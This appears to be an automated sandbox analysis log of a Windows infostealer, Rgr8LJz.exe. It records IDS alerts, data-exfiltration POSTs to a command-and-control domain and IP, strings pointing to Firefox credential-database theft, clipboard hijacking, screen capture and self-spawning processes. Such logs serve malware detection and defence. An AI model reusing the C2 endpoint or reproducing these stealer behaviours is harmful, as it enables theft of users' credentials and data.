Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.4.114:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3HEH0N7FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HDUT1ZRA56XN2JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W8WFOFWRUZT4PEWWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KK3S8JR0LSXHUL2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 969Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UTQDRZAZTR8LV2KLNM7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 575948Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: cureprouderio.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cureprouderio.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click

Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/=s
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api:M
Source: Rgr8LJz.exe, 00000003.00000002.2890668054.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/apil
Source: Rgr8LJz.exe, 00000003.00000002.2890740405.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/buPs
Source: Rgr8LJz.exe, 00000003.00000002.2890700213.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/pi
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/api
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/api4
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/apiL
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/apiefault-release/key4.dbPK
Source: Rgr8LJz.exe, 00000003.00000002.2890623821.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click:443/apin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49748 version: TLS 1.2

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_00437820 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437820

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_032C1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_032C1000

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_00437820 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437820

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_0043852B GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_0043852B

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00425828	3_2_00425828
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0040D0FF	3_2_0040D0FF
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00428970	3_2_00428970
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00411296	3_2_00411296
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041732D	3_2_0041732D
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00418BDB	3_2_00418BDB
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00412CA0	3_2_00412CA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043056F	3_2_0043056F
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00443EA0	3_2_00443EA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043CF10	3_2_0043CF10
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00444780	3_2_00444780
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00411FB1	3_2_00411FB1
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00442842	3_2_00442842
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042F056	3_2_0042F056
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00406870	3_2_00406870
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00435800	3_2_00435800
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00437820	3_2_00437820
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042B031	3_2_0042B031
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041E0C0	3_2_0041E0C0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004150D0	3_2_004150D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004308DA	3_2_004308DA
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004338DC	3_2_004338DC
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042E8F0	3_2_0042E8F0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0040B090	3_2_0040B090
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043056F	3_2_0043056F
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00403920	3_2_00403920
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042A9F4	3_2_0042A9F4
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043B98C	3_2_0043B98C
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041D990	3_2_0041D990
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00409270	3_2_00409270
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00444210	3_2_00444210
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041E2C0	3_2_0041E2C0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00405AD0	3_2_00405AD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004042D0	3_2_004042D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0040E2EA	3_2_0040E2EA
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004222F0	3_2_004222F0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004242FC	3_2_004242FC
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004162A3	3_2_004162A3
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043E2B9	3_2_0043E2B9
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00425828	3_2_00425828
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0040AB10	3_2_0040AB10
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00402B30	3_2_00402B30
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00416BC5	3_2_00416BC5
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00415BD0	3_2_00415BD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004433D0	3_2_004433D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00434BD9	3_2_00434BD9
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004063E0	3_2_004063E0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041ABE0	3_2_0041ABE0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043DBB0	3_2_0043DBB0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00402400	3_2_00402400
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004434C0	3_2_004434C0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041E4D0	3_2_0041E4D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004354D0	3_2_004354D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004444D0	3_2_004444D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043C4B0	3_2_0043C4B0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041FD60	3_2_0041FD60
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041557C	3_2_0041557C
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041D5D0	3_2_0041D5D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00404DE0	3_2_00404DE0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004375A0	3_2_004375A0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00407650	3_2_00407650
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00434656	3_2_00434656
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0040DE7D	3_2_0040DE7D
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041667E	3_2_0041667E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00430E0C	3_2_00430E0C
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00430E1E	3_2_00430E1E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041C620	3_2_0041C620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00443620	3_2_00443620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041DE30	3_2_0041DE30
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042FEC3	3_2_0042FEC3
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0041AED0	3_2_0041AED0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00417EDE	3_2_00417EDE
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042AE86	3_2_0042AE86
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00433E84	3_2_00433E84
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0042DEA0	3_2_0042DEA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004436A0	3_2_004436A0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00443750	3_2_00443750
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00434F7E	3_2_00434F7E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00402F10	3_2_00402F10
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043C710	3_2_0043C710
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00409720	3_2_00409720
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_0043A732	3_2_0043A732
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00427F37	3_2_00427F37
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004127C0	3_2_004127C0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00416FCC	3_2_00416FCC
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00425FD0	3_2_00425FD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00428FE6	3_2_00428FE6
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00428F9D	3_2_00428F9D
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00419FB0	3_2_00419FB0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_004407B0	3_2_004407B0

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: String function: 004150C0 appears 107 times
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: String function: 00408280 appears 50 times

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 924

Source: Rgr8LJz.exe, 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerasdlui.exej% vs Rgr8LJz.exe
Source: Rgr8LJz.exe, 00000000.00000002.1810103987.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Rgr8LJz.exe
Source: Rgr8LJz.exe, 00000000.00000000.1644148351.0000000000C98000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerasdlui.exej% vs Rgr8LJz.exe
Source: Rgr8LJz.exe	Binary or memory string: OriginalFilenamerasdlui.exej% vs Rgr8LJz.exe

Source: Rgr8LJz.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Rgr8LJz.exe

Static PE information: Section: .bss ZLIB complexity 1.0003245003918495

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/1

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_0043CF10 RtlExpandEnvironmentStrings,RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043CF10

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7276
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d901d459-229a-4185-85e3-d9ad43eef275

Jump to behavior

Source: Rgr8LJz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Rgr8LJz.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Rgr8LJz.exe	Virustotal: Detection: 49%
Source: Rgr8LJz.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\Rgr8LJz.exe

File read: C:\Users\user\Desktop\Rgr8LJz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 924
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process created: C:\Users\user\Desktop\Rgr8LJz.exe "C:\Users\user\Desktop\Rgr8LJz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Rgr8LJz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Rgr8LJz.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Rgr8LJz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: Rgr8LJz.exe, WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.pdbMZ source: WER9626.tmp.dmp.6.dr
Source:	Binary string: Handler.pdbL0 source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER9626.tmp.dmp.6.dr

Source: Rgr8LJz.exe

Static PE information: 0xFDE635DB [Fri Dec 26 08:18:35 2104 UTC]

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00449AA8 push ecx; retf		3_2_00449AB1
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 3_2_00449AB2 push ecx; retf		3_2_00449AB1

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
